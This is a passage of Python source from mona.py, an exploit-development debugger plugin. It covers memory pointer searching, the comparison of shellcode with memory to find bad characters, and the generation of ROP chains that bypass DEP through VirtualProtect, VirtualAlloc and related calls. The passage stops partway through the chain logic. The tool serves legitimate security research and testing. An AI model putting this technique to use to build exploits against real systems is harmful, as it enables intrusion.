when type is set to file, it won't actually search in memory for pattern, but it will
read all pointers from that file and search for pointers to those pointers
(so basically, type 'file' is only useful in combination with -p2p)
base - the base address in memory the search should start at
top - the top address in memory the search should not go beyond
consecutive - Boolean, indicating if consecutive pointers should be skipped
rangep2p - if not set to 0, the pointer to pointer search will also look rangep2p bytes back for each pointer,
thus allowing you to find close pointer to pointers
poffset - only used when doing p2p, will add offset to found pointer address before looking to ptr to ptr
poffsetlevel - apply the offset at this level of the chain
level - number of levels deep to look for ptr to ptr. level 0 is default, which means search for pointer to searchpattern
Return:
all pointers (or pointers to pointers) to the given search pattern in memory
"""
wildcardsearch = False
rangestosearch = []
tmpsearch = []
p2prangestosearch = []
global silent
if len(modulecriteria) > 0:
modulestosearch = getModulesToQuery(modulecriteria)
# convert modules to ranges
for modulename in modulestosearch:
objmod = MnModule(modulename)
mBase = objmod.moduleBase
mTop = objmod.moduleTop
if mBase < base and base < mTop:
mBase = base
if mTop > top:
mTop = top
if mBase >= base and mBase < top:
if not [mBase,mTop] in rangestosearch:
rangestosearch.append([mBase,mTop])
# if no modules were specified, then also add the other ranges (outside modules)
if not "modules" in modulecriteria:
outside = getRangesOutsideModules()
for range in outside:
mBase = range[0]
mTop = range[1]
if mBase < base and base < mTop:
mBase = base
if mTop > top:
mTop = top
if mBase >= base and mBase < top:
if not [mBase,mTop] in rangestosearch:
rangestosearch.append([mBase,mTop])
else:
rangestosearch.append([base,top])
tmpsearch.append([0,TOP_USERLAND])
allpointers = {}
originalPattern = pattern
# guess the type if it is not specified
if ptype == "":
if len(pattern) > 2 and pattern[0:2].lower() == "0x":
ptype = "ptr"
elif "\\x" in pattern:
ptype = "bin"
else:
ptype = "asc"
if ptype == "bin" and ".." in pattern:
wildcardsearch = True
if not silent:
dbg.log(" - Wildcard \\x.. detected")
if "unic" in criteria and ptype == "asc":
ptype = "bin"
binpat = ""
pattern = pattern.replace('"',"")
for thischar in pattern:
binpat += "\\x" + str(toHexByte(ord(thischar))) + "\\x00"
pattern = binpat
originalPattern += " (unicode)"
if not silent:
dbg.log(" - Expanded ascii pattern to unicode, switched search mode to bin")
bytes = ""
patternfilename = ""
split1 = re.compile(' ')
split2 = re.compile(':')
split3 = re.compile("\*")
if not silent:
dbg.log(" - Treating search pattern as %s" % ptype)
if ptype == "ptr":
pattern = pattern.replace("0x","")
value = int(pattern,16)
bytes = struct.pack('<I',value)
elif ptype == "bin":
if len(pattern) % 2 != 0:
dbg.log("Invalid hex pattern", highlight=1)
return
if not wildcardsearch:
bytes = hex2bin(pattern)
else:
# check if first byte is a byte and not a wildcard
if len(pattern) > 3 and pattern[2:4] == "..":
dbg.log(" *** Can't start a wildcard search with a wildcard. Specify a byte instead ***",highlight =1)
return
else:
# search for the first byte and then check wildcards later
foundstartbytes = False
sindex = 0
while not foundstartbytes:
b = pattern[sindex:sindex+4]
if not ".." in b:
bytes += hex2bin(pattern[sindex:sindex+4])
else:
foundstartbytes = True
sindex += 4
elif ptype == "asc":
if pattern.startswith('"') and pattern.endswith('"'):
pattern = pattern.replace('"',"")
elif pattern.startswith("'") and pattern.endswith("'"):
pattern = pattern.replace("'","")
bytes = pattern
elif ptype == "instr":
pattern = pattern.replace("'","").replace('"',"").replace(" "," ").replace(", ",",").replace(" #","#").replace("# ","#")
silent = True
bytes = hex2bin(assemble(pattern,""))
silent = False
if bytes == "":
dbg.log("Invalid instruction - could not assemble %s" % pattern,highlight=1)
return
elif ptype == "file":
patternfilename = pattern.replace("'","").replace('"',"")
dbg.log(" - Search patterns = all pointers in file %s" % patternfilename)
dbg.log(" Extracting pointers...")
FILE=open(patternfilename,"r")
contents = FILE.readlines()
FILE.close()
extracted = 0
for thisLine in contents:
if thisLine.lower().startswith("0x"):
lineparts=split1.split(thisLine)
thispointer = lineparts[0]
#get type = from : to *
if len(lineparts) > 1:
subparts = split2.split(thisLine)
if len(subparts) > 1:
if subparts[1] != "":
subsubparts = split3.split(subparts[1])
if not subsubparts[0] in allpointers:
allpointers[subsubparts[0]] = [hexStrToInt(thispointer)]
else:
allpointers[subsubparts[0]] += [hexStrToInt(thispointer)]
extracted += 1
dbg.log(" %d pointers extracted." % extracted)
dbg.updateLog()
fakeptrcriteria = {}
fakeptrcriteria["accesslevel"] = "*"
if "p2p" in criteria or level > 0:
#save range for later, search in all of userland for now
p2prangestosearch = rangestosearch
rangestosearch = tmpsearch
if ptype != "file":
for ranges in rangestosearch:
mBase = ranges[0]
mTop = ranges[1]
if not silent:
dbg.log("[+] Searching from 0x%s to 0x%s" % (toHex(mBase),toHex(mTop)))
dbg.updateLog()
searchPattern = []
searchPattern.append([originalPattern, bytes])
oldsilent=silent
silent=True
pointers = searchInRange(searchPattern,mBase,mTop,criteria)
silent=oldsilent
allpointers = mergeOpcodes(allpointers,pointers)
# filter out bad ones if wildcardsearch is enabled
if wildcardsearch and ptype == "bin":
nrbytes = ( len(pattern) / 4) - len(bytes)
if nrbytes > 0:
maskpart = pattern[len(bytes)*4:]
tocomparewith_tmp = maskpart.split("\\x")
tocomparewith = []
for tcw in tocomparewith_tmp:
if len(tcw) == 2:
tocomparewith.append(tcw)
dbg.log("[+] Applying wildcard mask, %d remaining bytes: %s" % (nrbytes,maskpart))
remptrs = {}
for ptrtype in allpointers:
for ptr in allpointers[ptrtype]:
rfrom = ptr + len(bytes)
bytesatlocation = dbg.readMemory(rfrom,nrbytes)
#dbg.log("Read %d bytes from 0x%08x" % (len(bytesatlocation),rfrom))
compareindex = 0
wildcardmatch = True
for thisbyte in bytesatlocation:
thisbytestr = bin2hexstr(thisbyte).replace("\\x","")
thisbytecompare = tocomparewith[compareindex]
if thisbytecompare != ".." and thisbytestr.lower() != thisbytecompare.lower():
wildcardmatch=False
break
compareindex += 1
if wildcardmatch:
if not ptrtype in remptrs:
remptrs[ptrtype] = [ptr]
else:
remptrs[ptrtype].append(ptr)
allpointers = remptrs
if ptype == "file" and level == 0:
level = 1
if consecutive:
# get all pointers and sort them
rawptr = {}
for ptrtype in allpointers:
for ptr in allpointers[ptrtype]:
if not ptr in rawptr:
rawptr[ptr]=ptrtype
if not silent:
dbg.log("[+] Number of pointers to process : %d" % len(rawptr))
sortedptr = rawptr.items()
sortedptr.sort(key = itemgetter(0))
#skip consecutive ones and increment size
consec_delta = len(bytes)
previousptr = 0
savedptr = 0
consec_size = 0
allpointers = {}
for ptr,ptrinfo in sortedptr:
if previousptr == 0:
previousptr = ptr
savedptr = ptr
if previousptr != ptr:
if ptr <= (previousptr + consec_delta):
previousptr = ptr
else:
key = ptrinfo + " ("+ str(previousptr+consec_delta-savedptr) + ")"
if not key in allpointers:
allpointers[key] = [savedptr]
else:
allpointers[key] += [savedptr]
previousptr = ptr
savedptr = ptr
#recursive search ?
if len(allpointers) > 0:
remainingpointers = allpointers
if level > 0:
thislevel = 1
while thislevel <= level:
if not silent:
pcnt = 0
for ptype,ptrs in remainingpointers.iteritems():
for ptr in ptrs:
pcnt += 1
dbg.log("[+] %d remaining types found at this level, total of %d pointers" % (len(remainingpointers),pcnt))
dbg.log("[+] Looking for pointers to pointers, level %d..." % thislevel)
poffsettxt = ""
if thislevel == poffsetlevel:
dbg.log(" I will apply offset %d (decimal) to discovered pointers to pointers..." % poffset)
poffsettxt = "%d(%xh)" % (poffset,poffset)
dbg.updateLog()
searchPattern = []
foundpointers = {}
for ptype,ptrs in remainingpointers.iteritems():
for ptr in ptrs:
cnt = 0
#if thislevel == poffsetlevel:
# ptr = ptr + poffset
while cnt <= rangep2p:
bytes = struct.pack('<I',ptr-cnt)
if ptype == "file":
originalPattern = ptype
if cnt == 0:
searchPattern.append(["ptr" + poffsettxt + " to 0x" + toHex(ptr) +" (-> ptr to " + originalPattern + ") ** ", bytes])
else:
searchPattern.append(["ptr" + poffsettxt + " to 0x" + toHex(ptr-cnt) +" (-> close ptr to " + originalPattern + ") ** ", bytes])
cnt += 1
#only apply rangep2p in level 1
if thislevel == 1:
rangep2p = 0
remainingpointers = {}
for ranges in p2prangestosearch:
mBase = ranges[0]
mTop = ranges[1]
if not silent:
dbg.log("[+] Searching from 0x%s to 0x%s" % (toHex(mBase),toHex(mTop)))
dbg.updateLog()
oldsilent = silent
silent=True
pointers = searchInRange(searchPattern,mBase,mTop,fakeptrcriteria)
silent=oldsilent
for ptrtype in pointers:
if not ptrtype in remainingpointers:
if poffsetlevel == thislevel:
# fixup found pointers, apply offset now
ptrlist = []
for thisptr in pointers[ptrtype]:
thisptr = thisptr + poffset
ptrlist.append(thisptr)
pointers[ptrtype] = ptrlist
remainingpointers[ptrtype] = pointers[ptrtype]
thislevel += 1
if len(remainingpointers) == 0:
if not silent:
dbg.log("[+] No more pointers left, giving up...", highlight=1)
break
allpointers = remainingpointers
return allpointers
def compareFileWithMemory(filename,startpos,skipmodules=False,findunicode=False):
dbg.log("[+] Reading file %s..." % filename)
srcdata_normal=[]
srcdata_unicode=[]
tagresults=[]
criteria = {}
criteria["accesslevel"] = "*"
try:
srcfile = open(filename,"rb")
content = srcfile.readlines()
srcfile.close()
for eachLine in content:
srcdata_normal += eachLine
for eachByte in srcdata_normal:
eachByte+=struct.pack('B', 0)
srcdata_unicode += eachByte
dbg.log(" Read %d bytes from file" % len(srcdata_normal))
except:
dbg.log("Error while reading file %s" % filename, highlight=1)
return
# loop normal and unicode
comparetable=dbg.createTable('mona Memory comparison results',['Address','Status','BadChars','Type','Location'])
modes = ["normal", "unicode"]
if not findunicode:
modes.remove("unicode")
objlogfile = MnLog("compare.txt")
logfile = objlogfile.reset()
for mode in modes:
if mode == "normal":
srcdata = srcdata_normal
if mode == "unicode":
srcdata = srcdata_unicode
maxcnt = len(srcdata)
if maxcnt < 8:
dbg.log("Error - file does not contain enough bytes (min 8 bytes needed)",highlight=1)
return
locations = []
if startpos == 0:
dbg.log("[+] Locating all copies in memory (%s)" % mode)
btcnt = 0
cnt = 0
linecount = 0
hexstr = ""
hexbytes = ""
for eachByte in srcdata:
if cnt < 8:
hexbytes += eachByte
if len((hex(ord(srcdata[cnt]))).replace('0x',''))==1:
hexchar=hex(ord(srcdata[cnt])).replace('0x', '\\x0')
else:
hexchar = hex(ord(srcdata[cnt])).replace('0x', '\\x')
hexstr += hexchar
cnt += 1
dbg.log(" - searching for "+hexstr)
global silent
silent = True
results = findPattern({},criteria,hexstr,"bin",0,TOP_USERLAND,False)
for type in results:
for ptr in results[type]:
ptrinfo = MnPointer(ptr).memLocation()
if not skipmodules or (skipmodules and (ptrinfo in ["Heap","Stack","??"])):
locations.append(ptr)
if len(locations) == 0:
dbg.log(" Oops, no copies found")
else:
startpos_fixed = startpos
locations.append(startpos_fixed)
if len(locations) > 0:
dbg.log(" - Comparing %d location(s)" % (len(locations)))
dbg.log("Comparing bytes from file with memory :")
for location in locations:
memcompare(location,srcdata,comparetable,mode, smart=(mode == 'normal'))
silent = False
return
def memoized(func):
''' A function decorator to make a function cache it's return values.
If a function returns a generator, it's transformed into a list and
cached that way. '''
cache = {}
def wrapper(*args):
if args in cache:
return cache[args]
import time; start = time.time()
val = func(*args)
if isinstance(val, types.GeneratorType):
val = list(val)
cache[args] = val
return val
wrapper.__doc__ = func.__doc__
wrapper.func_name = '%s_memoized' % func.func_name
return wrapper
class MemoryComparator(object):
''' Solve the memory comparison problem with a special dynamic programming
algorithm similar to that for the LCS problem '''
Chunk = namedtuple('Chunk', 'unmodified i j dx dy xchunk ychunk')
move_to_gradient = {
0: (0, 0),
1: (0, 1),
2: (1, 1),
3: (2, 1),
}
def __init__(self, x, y):
self.x, self.y = x, y
@memoized
def get_last_unmodified_chunk(self):
''' Returns the index of the last chunk of size > 1 that is unmodified '''
try:
return max(i for i, c in enumerate(self.get_chunks()) if c.unmodified and c.dx > 1)
except:
# no match
return -1
@memoized
def get_grid(self):
''' Builds a 2-d suffix grid for our DP algorithm. '''
x = self.x
y = self.y[:len(x)*2]
width, height = len(x), len(y)
values = [[0] * (width + 1) for j in range(height + 1)]
moves = [[0] * (width + 1) for j in range(height + 1)]
equal = [[x[i] == y[j] for i in range(width)] for j in range(height)]
equal.append([False] * width)
for j, i in itertools.product(rrange(height + 1), rrange(width + 1)):
value = values[j][i]
if i >= 1 and j >= 1:
if equal[j-1][i-1]:
values[j-1][i-1] = value + 1
moves[j-1][i-1] = 2
elif value > values[j][i-1]:
values[j-1][i-1] = value
moves[j-1][i-1] = 2
if i >= 1 and not equal[j][i-1] and value - 2 > values[j][i-1]:
values[j][i-1] = value - 2
moves[j][i-1] = 1
if i >= 1 and j >= 2 and not equal[j-2][i-1] and value - 1 > values[j-2][i-1]:
values[j-2][i-1] = value - 1
moves[j-2][i-1] = 3
return (values, moves)
@memoized
def get_blocks(self):
'''
Compares two binary strings under the assumption that y is the result of
applying the following transformations onto x:
* change single bytes in x (likely)
* expand single bytes in x to two bytes (less likely)
* drop single bytes in x (even less likely)
Returns a generator that yields elements of the form (unmodified, xdiff, ydiff),
where each item represents a binary chunk with "unmodified" denoting whether the
chunk is the same in both strings, "xdiff" denoting the size of the chunk in x
and "ydiff" denoting the size of the chunk in y.
Example:
>>> x = "abcdefghijklm"
>>> y = "mmmcdefgHIJZklm"
>>> list(MemoryComparator(x, y).get_blocks())
[(False, 2, 3), (True, 5, 5),
(False, 3, 4), (True, 3, 3)]
'''
x, y = self.x, self.y
_, moves = self.get_grid()
# walk the grid
path = []
i, j = 0, 0
while True:
dy, dx = self.move_to_gradient[moves[j][i]]
if dy == dx == 0: break
path.append((dy == 1 and x[i] == y[j], dy, dx))
j, i = j + dy, i + dx
for i, j in zip(range(i, len(x)), itertools.count(j)):
if j < len(y): path.append((x[i] == y[j], 1, 1))
else: path.append((False, 0, 1))
i = j = 0
for unmodified, subpath in itertools.groupby(path, itemgetter(0)):
ydiffs = map(itemgetter(1), subpath)
dx, dy = len(ydiffs), sum(ydiffs)
yield unmodified, dx, dy
i += dx
j += dy
@memoized
def get_chunks(self):
i = j = 0
for unmodified, dx, dy in self.get_blocks():
yield self.Chunk(unmodified, i, j, dx, dy, self.x[i:i+dx], self.y[j:j+dy])
i += dx
j += dy
@memoized
def guess_mapping(self):
''' Tries to guess how the bytes in x have been mapped to substrings in y by
applying nasty heuristics.
Examples:
>>> list(MemoryComparator("abcdefghijklm", "mmmcdefgHIJZklm").guess_mapping())
[('m', 'm'), ('m',), ('c',), ('d',), ('e',), ('f',), ('g',), ('H', 'I'), ('J',),
('Z',), ('k',), ('l',), ('m',)]
>>> list(MemoryComparator("abcdefgcbadefg", "ABBCdefgCBBAdefg").guess_mapping())
[('A',), ('B', 'B'), ('C',), ('d',), ('e',), ('f',), ('g',), ('C',), ('B', 'B'),
('A',), ('d',), ('e',), ('f',), ('g',)]
'''
x, y = self.x, self.y
mappings_by_byte = defaultdict(lambda: defaultdict(int))
for c in self.get_chunks():
dx, dy = c.dx, c.dy
# heuristics to detect expansions
if dx < dy and dy - dx <= 3 and dy <= 5:
for i, b in enumerate(c.xchunk):
slices = set()
for start in range(i, min(2*i + 1, dy)):
for size in range(1, min(dy - start + 1, 3)):
slc = tuple(c.ychunk[start:start+size])
if slc in slices: continue
mappings_by_byte[b][slc] += 1
slices.add(slc)
for b, values in mappings_by_byte.iteritems():
mappings_by_byte[b] = sorted(values.items(),
key=lambda (value, count): (-count, -len(value)))
for c in self.get_chunks():
dx, dy, xchunk, ychunk = c.dx, c.dy, c.xchunk, c.ychunk
if dx < dy: # expansion
# try to apply heuristics for small chunks
if dx <= 10:
res = []
for b in xchunk:
if dx == dy or dy >= 2*dx: break
for value, count in mappings_by_byte[b]:
if tuple(ychunk[:len(value)]) != value: continue
res.append(value)
ychunk = ychunk[len(value):]
dy -= len(value)
break
else:
yield (ychunk[0],)
ychunk = ychunk[1:]
dy -= 1
dx -= 1
for c in res: yield c
# ... or do it the stupid way. If n bytes were changed to m, simply do
# as much drops/expansions as necessary at the beginning and than
# yield the rest of the y chunk as single-byte modifications
for k in range(dy - dx): yield tuple(ychunk[2*k:2*k+2])
ychunk = ychunk[2*(dy - dx):]
elif dx > dy:
for _ in range(dx - dy): yield ()
for b in ychunk: yield (b,)
def read_memory(dbg, location, max_size):
''' read the maximum amount of memory from the given address '''
for i in rrange(max_size + 1, 0):
mem = dbg.readMemory(location, i)
if len(mem) == i:
return mem
# we should never get here, i == 0 should always fulfill the above condition
assert False
def shorten_bytes(bytes, size=8):
if len(bytes) <= size: return bin2hex(bytes)
return '%02x ... %02x' % (ord(bytes[0]), ord(bytes[-1]))
def draw_byte_table(mapping, log, columns=16):
hrspace = 3 * columns - 1
hr = '-'*hrspace
log(' ,' + hr + '.')
log(' |' + ' Comparison results:'.ljust(hrspace) + '|')
log(' |' + hr + '|')
for i, chunk in enumerate(extract_chunks(mapping, columns)):
chunk = list(chunk) # save generator result in a list
src, mapped = zip(*chunk)
values = []
for left, right in zip(src, mapped):
if left == right: values.append('') # byte matches original
elif len(right) == 0: values.append('-1') # byte dropped
elif len(right) == 2: values.append('+1') # byte expanded
else: values.append(bin2hex(right)) # byte modified
line1 = '%3x' % (i * columns) + ' |' + bin2hex(src)
line2 = ' |' + ' '.join(sym.ljust(2) for sym in values)
# highlight lines if a modification was detected - removed, looks bad in WinDBG
#highlight = any(x != y for x, y in chunk)
#for l in (line1, line2):
log(line1.ljust(5 + hrspace) + '| File')
log(line2.ljust(5 + hrspace) + '| Memory')
log(' `' + hr + "'")
def draw_chunk_table(cmp, log):
''' Outputs a table that compares the found memory chunks side-by-side
in input file vs. memory '''
table = [('', '', '', '', 'File', 'Memory', 'Note')]
delims = (' ', ' ', ' ', ' | ', ' | ', ' | ', '')
last_unmodified = cmp.get_last_unmodified_chunk()
for c in cmp.get_chunks():
if c.dy == 0: note = 'missing'
elif c.dx > c.dy: note = 'compacted'
elif c.dx < c.dy: note = 'expanded'
elif c.unmodified: note = 'unmodified!'
else: note = 'corrupted'
table.append((c.i, c.j, c.dx, c.dy, shorten_bytes(c.xchunk), shorten_bytes(c.ychunk), note))
# draw the table
sizes = tuple(max(len(str(c)) for c in col) for col in zip(*table))
for i, row in enumerate(table):
log(''.join(str(x).ljust(size) + delim for x, size, delim in zip(row, sizes, delims)))
if i == 0 or (i == last_unmodified + 1 and i < len(table)):
log('-' * (sum(sizes) + sum(len(d) for d in delims)))
def guess_bad_chars(cmp, log, logsilent):
guessed_badchars = []
''' Tries to guess bad characters and outputs them '''
bytes_in_changed_blocks = defaultdict(int)
chunks = cmp.get_chunks()
last_unmodified = cmp.get_last_unmodified_chunk()
for i, c in enumerate(chunks):
if c.unmodified: continue
if i == last_unmodified + 1:
# only report the first character as bad in the final corrupted chunk
bytes_in_changed_blocks[c.xchunk[0]] += 1
break
for b in set(c.xchunk):
bytes_in_changed_blocks[b] += 1
# guess bad chars
likely_bc = [char for char, count in bytes_in_changed_blocks.iteritems() if count > 2]
if likely_bc:
if not logsilent:
log("Very likely bad chars: %s" % bin2hex(sorted(likely_bc)))
guessed_badchars += list(sorted(likely_bc))
if not logsilent:
log("Possibly bad chars: %s" % bin2hex(sorted(bytes_in_changed_blocks)))
guessed_badchars += list(sorted(bytes_in_changed_blocks))
# list bytes already omitted from the input
bytes_omitted_from_input = set(map(chr, range(0, 256))) - set(cmp.x)
if bytes_omitted_from_input:
log("Bytes omitted from input: %s" % bin2hex(sorted(bytes_omitted_from_input)))
guessed_badchars += list(sorted( bytes_omitted_from_input))
# return list, use list(set(..)) to remove dups
return list(set(guessed_badchars))
def memcompare(location, src, comparetable, sctype, smart=True, tablecols=16):
''' Thoroughly compares an input binary string with a location in memory
and outputs the results. '''
# set up logging
objlogfile = MnLog("compare.txt")
logfile = objlogfile.reset(False)
# helpers
def log(msg='', **kw):
msg = str(msg)
dbg.log(msg, address=location, **kw)
objlogfile.write(msg, logfile)
def add_to_table(msg,badbytes = []):
locinfo = MnPointer(location).memLocation()
badbstr = " "
if len(badbytes) > 0:
badbstr = "%s " % bin2hex(sorted(badbytes))
comparetable.add(0, ['0x%08x' % location, msg, badbstr, sctype, locinfo])
objlogfile.write("-" * 100,logfile)
log('[+] Comparing with memory at location : 0x%08x (%s)' % (location,MnPointer(location).memLocation()), highlight=1)
dbg.updateLog()
mem = read_memory(dbg, location, 2*len(src))
if smart:
cmp = MemoryComparator(src, mem)
mapped_chunks = map(''.join, cmp.guess_mapping())
else:
mapped_chunks = list(mem[:len(src)]) + [()] * (len(src) - len(mem))
mapping = zip(src, mapped_chunks)
broken = [(i,x,y) for i,(x,y) in enumerate(mapping) if x != y]
if not broken:
log('!!! Hooray, %s shellcode unmodified !!!' % sctype, focus=1, highlight=1)
add_to_table('Unmodified')
guessed_bc = guess_bad_chars(cmp, log, True)
else:
log("Only %d original bytes of '%s' code found." % (len(src) - len(broken), sctype))
draw_byte_table(mapping, log, columns=tablecols)
log()
guessed_bc = []
if smart:
# print additional analysis
draw_chunk_table(cmp, log)
log()
guessed_bc = guess_bad_chars(cmp, log, False)
log()
add_to_table('Corruption after %d bytes' % broken[0][0],guessed_bc)
#-----------------------------------------------------------------------#
# ROP related functions
#-----------------------------------------------------------------------#
def createRopChains(suggestions,interestinggadgets,allgadgets,modulecriteria,criteria,objprogressfile,progressfile):
"""
Will attempt to produce ROP chains
"""
global ptr_to_get
global ptr_counter
global silent
global noheader
global ignoremodules
#vars
vplogtxt = ""
# RVA ?
showrva = False
if "rva" in criteria:
showrva = True
#define rop routines
routinedefs = {}
routinesetup = {}
virtualprotect = [["esi","api"],["ebp","jmp esp"],["ebx",0x201],["edx",0x40],["ecx","&?W"],["edi","ropnop"],["eax","nop"]]
virtualalloc = [["esi","api"],["ebp","jmp esp"],["ebx",0x01],["edx",0x1000],["ecx",0x40],["edi","ropnop"],["eax","nop"]]
setinformationprocess = [["ebp","api"],["edx",0x22],["ecx","&","0x00000002"],["ebx",0xffffffff],["eax",0x4],["edi","pop"]]
setprocessdeppolicy = [["ebp","api"],["ebx","&","0x00000000"],["edi","pop"]]
routinedefs["VirtualProtect"] = virtualprotect
routinedefs["VirtualAlloc"] = virtualalloc
# only run these on older systems
osver=dbg.getOsVersion()
if not (osver == "6" or osver == "7" or osver == "8" or osver == "vista" or osver == "win7" or osver == "2008server" or osver == "win8"):
routinedefs["SetInformationProcess"] = setinformationprocess
routinedefs["SetProcessDEPPolicy"] = setprocessdeppolicy
modulestosearch = getModulesToQuery(modulecriteria)
routinesetup["VirtualProtect"] = """--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualProtect()
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------"""
routinesetup["VirtualAlloc"] = """--------------------------------------------
EAX = NOP (0x90909090)
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualAlloc()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualAlloc()
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------"""
routinesetup["SetInformationProcess"] = """--------------------------------------------
EAX = SizeOf(ExecuteFlags) (0x4)
ECX = &ExecuteFlags (ptr to 0x00000002)
EDX = ProcessExecuteFlags (0x22)
EBX = NtCurrentProcess (0xffffffff)
ESP = ReturnTo (automatic)
EBP = ptr to NtSetInformationProcess()
ESI = <not used>
EDI = ROP NOP (4 byte stackpivot)
--------------------------------------------"""
routinesetup["SetProcessDEPPolicy"] = """--------------------------------------------
EAX = <not used>
ECX = <not used>
EDX = <not used>
EBX = dwFlags (ptr to 0x00000000)
ESP = ReturnTo (automatic)
EBP = ptr to SetProcessDEPPolicy()
ESI = <not used>
EDI = ROP NOP (4 byte stackpivot)
--------------------------------------------"""
updatetxt = ""
for routine in routinedefs:
thischain = {}
updatetxt = "Attempting to produce rop chain for %s" % routine
dbg.log("[+] %s" % updatetxt)
objprogressfile.write("- " + updatetxt,progressfile)
vplogtxt += "\n"
vplogtxt += "#" * 80
vplogtxt += "\n\nRegister setup for " + routine + "() :\n" + routinesetup[routine] + "\n\n"
targetOS = "(XP/2003 Server and up)"
if routine == "SetInformationProcess":
targetOS = "(XP/2003 Server only)"
if routine == "SetProcessDEPPolicy":
targetOS = "(XP SP3/Vista SP1/2008 Server SP1, can be called only once per process)"
title = "ROP Chain for %s() [%s] :" % (routine,targetOS)
vplogtxt += "\n%s\n" % title
vplogtxt += ("-" * len(title)) + "\n\n"
vplogtxt += "*** [ Ruby ] ***\n\n"
vplogtxt += " def create_rop_chain()\n"
vplogtxt += '\n # rop chain generated with mona.py - www.corelan.be'
vplogtxt += "\n rop_gadgets = \n"
vplogtxt += " [\n"
thischaintxt = ""
dbg.updateLog()
modused = {}
skiplist = []
replacelist = {}
toadd = {}
movetolast = []
regsequences = []
stepcnt = 1
for step in routinedefs[routine]:
thisreg = step[0]
thistarget = step[1]
if thisreg in replacelist:
thistarget = replacelist[thisreg]
thistimestamp=datetime.datetime.now().strftime("%a %Y/%m/%d %I:%M:%S %p")
dbg.log(" %s: Step %d/%d: %s" % (thistimestamp,stepcnt,len(routinedefs[routine]),thisreg))
stepcnt += 1
if not thisreg in skiplist:
regsequences.append(thisreg)
# this must be done first, so we can determine deviations to the chain using
# replacelist and skiplist arrays
if str(thistarget) == "api":
objprogressfile.write(" * Enumerating ROPFunc info",progressfile)
#dbg.log(" Enumerating ROPFunc info")
# routine to put api pointer in thisreg
funcptr,functext = getRopFuncPtr(routine,modulecriteria,criteria,"iat")
if routine == "SetProcessDEPPolicy" and funcptr == 0:
# read EAT
funcptr,functext = getRopFuncPtr(routine,modulecriteria,criteria,"eat")
extra = ""
if funcptr == 0:
extra = "[-] Unable to find ptr to "
thischain[thisreg] = [[0,extra + routine + "() (-> to be put in " + thisreg + ")",0]]
else:
thischain[thisreg] = putValueInReg(thisreg,funcptr,routine + "() [" + MnPointer(funcptr).belongsTo() + "]",suggestions,interestinggadgets,criteria)
else:
objprogressfile.write(" Function pointer : 0x%0x",funcptr)
objprogressfile.write(" * Getting pickup gadget",progressfile)
thischain[thisreg],skiplist = getPickupGadget(thisreg,funcptr,functext,suggestions,interestinggadgets,criteria,modulecriteria,routine)
# if skiplist is not empty, then we are using the alternative pickup (via jmp [eax])
# this means we have to make some changes to the routine
# and place this pickup at the end
if len(skiplist) > 0:
if routine.lower() == "virtualprotect" or routine.lower() == "virtualalloc":
replacelist["ebp"] = "pop"
#set up call to finding jmp esp
oldsilent = silent
silent=True
ptr_counter = 0
ptr_to_get = 3
jmpreg = findJMP(modulecriteria,criteria,"esp")
ptr_counter = 0
ptr_to_get = -1
jmpptr = 0
jmptype = ""
silent=oldsilent
total = getNrOfDictElements(jmpreg)
if total > 0:
ptrindex = random.randint(1,total)
indexcnt= 1
for regtype in jmpreg:
for ptr in jmpreg[regtype]:
if indexcnt == ptrindex:
jmpptr = ptr
jmptype = regtype
break
indexcnt += 1
if jmpptr > 0:
toadd[thistarget] = [jmpptr,"ptr to '" + jmptype + "'"]
else:
toadd[thistarget] = [jmpptr,"ptr to 'jmp esp'"]
# make sure the pickup is placed last
movetolast.append(thisreg)
if str(thistarget).startswith("jmp"):
targetreg = str(thistarget).split(" ")[1]
#set up call to finding jmp esp
oldsilent = silent
silent=True
ptr_counter = 0
ptr_to_get = 3
jmpreg = findJMP(modulecriteria,criteria,targetreg)
ptr_counter = 0
ptr_to_get = -1
jmpptr = 0
jmptype = ""
silent=oldsilent
total = getNrOfDictElements(jmpreg)
if total > 0:
ptrindex = random.randint(1,total)
indexcnt= 1
for regtype in jmpreg:
for ptr in jmpreg[regtype]:
if indexcnt == ptrindex:
jmpptr = ptr
jmptype = regtype
break
indexcnt += 1
jmpinfo = ""
if jmpptr == 0:
jmptype = ""
jmpinfo = "Unable to find ptr to 'JMP ESP'"
else:
jmpinfo = MnPointer(jmpptr).belongsTo()
thischain[thisreg] = putValueInReg(thisreg,jmpptr,"& " + jmptype + " [" + jmpinfo + "]",suggestions,interestinggadgets,criteria)
if str(thistarget) == "ropnop":
ropptr = 0
for poptype in suggestions:
if poptype.startswith("pop "):
for retptr in suggestions[poptype]:
if getOffset(interestinggadgets[retptr]) == 0 and interestinggadgets[retptr].count("#") == 2:
ropptr = retptr+1
break
if poptype.startswith("inc "):
for retptr in suggestions[poptype]:
if getOffset(interestinggadgets[retptr]) == 0 and interestinggadgets[retptr].count("#") == 2:
ropptr = retptr+1
break
if poptype.startswith("dec "):
for retptr in suggestions[poptype]:
if getOffset(interestinggadgets[retptr]) == 0 and interestinggadgets[retptr].count("#") == 2:
ropptr = retptr+1
break
if poptype.startswith("neg "):
for retptr in suggestions[poptype]:
if getOffset(interestinggadgets[retptr]) == 0 and interestinggadgets[retptr].count("#") == 2:
ropptr = retptr+2
break
if ropptr == 0:
for emptytype in suggestions:
if emptytype.startswith("empty "):
for retptr in suggestions[emptytype]:
if interestinggadgets[retptr].startswith("# XOR"):
if getOffset(interestinggadgets[retptr]) == 0:
ropptr = retptr+2
break
if ropptr > 0:
